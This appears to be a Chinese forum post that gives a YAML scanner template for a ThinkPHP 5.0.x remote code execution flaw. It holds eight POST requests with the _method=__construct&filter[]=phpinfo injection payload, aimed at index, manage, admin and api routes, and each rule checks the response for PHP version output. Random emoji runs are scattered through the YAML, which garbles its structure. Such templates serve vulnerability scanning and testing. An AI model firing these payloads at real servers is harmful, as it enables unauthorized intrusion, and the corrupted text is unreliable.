thinkphp-5010-rce漏洞 |
漏洞文件后缀名是.yaml
id: thinkphp-5010-rce info: name: ThinkPHP 5.0.10 RCE👨⚕️🥼🛋😰✍ author: zan8in severity: critical description: ThinkPHP <= 5.0.13 reference: - https://github.com/Lotus6/ThinkphpGUI/blob/main/ThinkphpGUI/src/main/java/exploit/ 👍🌕🫖🈳🦮 rules: r0: request: method: POST 👃🌧🍓⚛🐮 path: /?s=index body: | s=-1&_method=__construct&method=post&filter[]=phpinfo expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容) r1:🧢🪜😰👆 request: method: POST path: /?s=manage body: | s=-1&_method=__construct&method=post&filter[]=phpinfo 🖐🌕🔪🆒🐖 expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容) r2: request: method: POST path: /?s=admin🧑💻🧦📠😂👀 body: | s=-1&_method=__construct&method=post&filter[]=phpinfo expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容) r3: request: 👄🏦🍇📶🦚 method: POST path: /?s=api body: | s=-1&_method=__construct&method=post&filter[]=phpinfo expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容) 👈🚈🫑↔🐺 r4: request: method: POST path: /?s=index body: | 👂🌞🍚®🐮 _method=__construct&method=get&filter[]=phpinfo&get[]=-1 expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容) r5: request: method: POST 👂🔥🍟🆒🐋 path: /?s=manage body: | _method=__construct&method=get&filter[]=phpinfo&get[]=-1 expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容) r6:🧓👞🧬😔🖕 request: method: POST path: /?s=admin body: | _method=__construct&method=get&filter[]=phpinfo&get[]=-1 ✍🏠🥛🆗🦜 expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容) r7: request: method: POST path: /?s=api 💅🏝🍖❌🐺 body: | _method=__construct&method=get&filter[]=phpinfo&get[]=-1 expression: 状态码 == 200 && 是否包含(响应内容,'PHP Extension') && 是否包含(响应内容,'PHP Version') && 正则匹配('>PHP Version <\/td><td class="v">([0-9.]+)',响应内容) expression: r0() || r1() || r2() || r3() || r4() || r5() || r6()|| r7()
帖子热度 2338 ℃
|
|